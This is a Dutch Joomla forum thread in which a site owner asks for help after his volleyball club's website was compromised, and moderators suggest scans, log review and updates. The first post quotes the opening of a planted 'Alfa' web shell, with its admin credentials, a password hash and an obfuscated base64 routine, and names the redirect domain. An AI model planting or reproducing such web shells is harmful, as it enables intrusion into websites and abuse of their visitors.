Welkom, Gasten
Gebruikersnaam: Wachtwoord: Onthoud mij
12 jan 2019
Diverse hosters zijn van PHP 5.x.x en PHP 7.x.x automatisch overgeschakeld naar PHP 7.3.x. Als je Joomla website en de gebruikte extensies (componenten, plugins en modules) niet up-to-date zijn kan hierdoor je website niet meer werken.
Lees meer...
  • Pagina:
  • 1
  • 2

Onderwerp: Voor mijn volleybalsite komt opeens zo'n 'reclame' page mee...

Voor mijn volleybalsite komt opeens zo'n 'reclame' page mee... 1 jaar 5 maanden geleden #1

  • nkamp
  • nkamp's Profielfoto Onderwerp Auteur
  • Offline
  • Senior Boarder
  • Senior Boarder
  • Berichten: 76
  • Ontvangen bedankjes 0
Hallo,

Ik heb een keer iets dergelijks gehad bij de volleybalsite, Leen heeft mij toen uitstekend geholpen, maar sinds deze week krijg ik opeens weer zo'n reclame pagina popup mee als ik naar de volleybalsitevolleybalsite ga. Nu zie ik in de root opeens daar bestanden staan die ik nog nooit heb zien staan:
  • contacts.php
  • pagenews.php
  • userloader.php

De code die erin zit lijkt overeen te komen met wat er destijds in zat, echter nu kon ik wel de akeeba backup op mijn localhost terug zetten wat destijds niet lukte.
Hierbij een stukje van de code:
<?php
$GLOBALS['Alfa_User'] = 'admin';
$GLOBALS['Alfa_Pass'] = '8a4bf282852bf4c49e17f0951f645e72';
$GLOBALS['Alfa_Protect_Shell'] = '1';
$GLOBALS['Alfa_Login_Page'] = '404';
$GLOBALS['Alfa_Show_Icons'] = '1';

if(!function_exists('b'.'as'.'e6'.'4_'.'en'.'co'.'de')){function __ZW5jb2Rlcg($data){if(empty($data))return;$b64='ABCDEF

De site die elke keer geopend werd was van "//babybabybabyoooh.net/security".
Hoe ernstig is dit? Ik kan dit niet goed inschatten? Is het nog onschuldig, enkel rotzooi heb je ervan?
Wat ik mij nu af vraag, waar komt dit van daan? Hoe is het gelukt om die bestanden daar te plaatsen? Moet ik naar mijn provider gaan?

Ik heb de site afgelopen week naar 3.8.1 gebracht.

Bedankt,

Nico

Gelieve Inloggen of Maak een account aan om te deelnemen aan het gesprek.

Voor mijn volleybalsite komt opeens zo'n 'reclame' page mee... 1 jaar 5 maanden geleden #2

  • Leen
  • Leen's Profielfoto
  • Offline
  • Administrator
  • Administrator
  • Geen zorgen voor de dag van morgen
  • Berichten: 3825
  • Karma: 2
  • Ontvangen bedankjes 87
Hallo Nico,

Die 3 bestanden in je root weet niet waar ze vandaan komen normaal staan ze daar niet .
Maar als je een akeeba back-up heb terug gezet maak je van te voren dan wel goed die map leeg.
En nadien goed eerst alle modules en extensies en plug-in controleren op Updates
voor je weer echt gaat Update naar nieuwe versie
M.v.g Leen
Bijlagen:

Gelieve Inloggen of Maak een account aan om te deelnemen aan het gesprek.

Voor mijn volleybalsite komt opeens zo'n 'reclame' page mee... 1 jaar 5 maanden geleden #3

  • Leen
  • Leen's Profielfoto
  • Offline
  • Administrator
  • Administrator
  • Geen zorgen voor de dag van morgen
  • Berichten: 3825
  • Karma: 2
  • Ontvangen bedankjes 87
Heb nog even je site laten scannen bij sucuri scan
en zo te zien heb je iets opgelopen
M.v.g Leen
Bijlagen:
De volgende gebruiker (s) zei dank u: nkamp

Gelieve Inloggen of Maak een account aan om te deelnemen aan het gesprek.

Voor mijn volleybalsite komt opeens zo'n 'reclame' page mee... 1 jaar 5 maanden geleden #4

  • nkamp
  • nkamp's Profielfoto Onderwerp Auteur
  • Offline
  • Senior Boarder
  • Senior Boarder
  • Berichten: 76
  • Ontvangen bedankjes 0
Hallo,

Aan die sucuri had ik weer even niet gedacht, bedankt!

Maar ik heb het volgens mij gevonden, het zat in de index.php van de template (shape5). Ik heb het daar uitgehaald. Ik heb nu alle files door gescanned op wat sucuri aangeeft, ik heb de database doorzocht door de dump te doorzoeken op de tekens die sucuri aan geeft, niets meer gevonden of kunnen vinden!

Maar sucuri geeft nog steeds dat het wat vindt? Ook als ik view source in de browser doe, kan ik wat sucuri aan geeft, niet vinden.

Hoe kom ik er nu achter of de site nu wel of niet schoon is?

Gr.,

Nico

Gelieve Inloggen of Maak een account aan om te deelnemen aan het gesprek.

Voor mijn volleybalsite komt opeens zo'n 'reclame' page mee... 1 jaar 5 maanden geleden #5

  • Ron
  • Ron's Profielfoto
  • Offline
  • Administrator
  • Administrator
  • Berichten: 2064
  • Karma: 1
  • Ontvangen bedankjes 48
Misschien je cache van je site even opschonen.

En dan nogmaals scan uitvoeren!

Groeten Ron
Bent u opzoek naar een een Hotel in Sauerland voor uw motor, Fiets en wandelvakantie dan zit u bij Hotel Landgasthof Grevenstein op het juiste adres!
Handelsregister-Nr: HRA6354 Amtsgericht: Arnsberg

Gelieve Inloggen of Maak een account aan om te deelnemen aan het gesprek.

Voor mijn volleybalsite komt opeens zo'n 'reclame' page mee... 1 jaar 5 maanden geleden #6

  • Otto
  • Otto's Profielfoto
  • Offline
  • Administrator
  • Administrator
  • Er bestaan geen domme vragen
  • Berichten: 1235
  • Karma: 1
  • Ontvangen bedankjes 35
Hoi Nico,

Vergeet niet je Apache logs door te spitten en te onderzoeken hoe men binnen gekomen is.
- Via een besmette pc?
- Een kwetsbare extensie?
- het te laat updaten van Joomla
- Verkeerd toegewezen rechten aan mappen en bestanden

Op deze manier doe je namelijk alleen maar aan symptoombestrijding.
Artenweb.nl creatieve unieke Joomla en VirtueMart websites!
Vragen allen via dit Forum!
KvK: 61932647 - Voor onderscheidende Joomla sites die werken!

Gelieve Inloggen of Maak een account aan om te deelnemen aan het gesprek.

  • Pagina:
  • 1
  • 2
Tijd voor maken pagina: 1.180 seconden
Gemaakt door Kunena
logo mijnjoomlaforum colored puzzle2

MijnJoomlaForum.nl is niet verbonden aan en is geen onderdeel van Open Source Matters, Inc, of het Joomla! project!

Hosted by Otto
Webdesign by Renata
Sitemap

Donatie Knop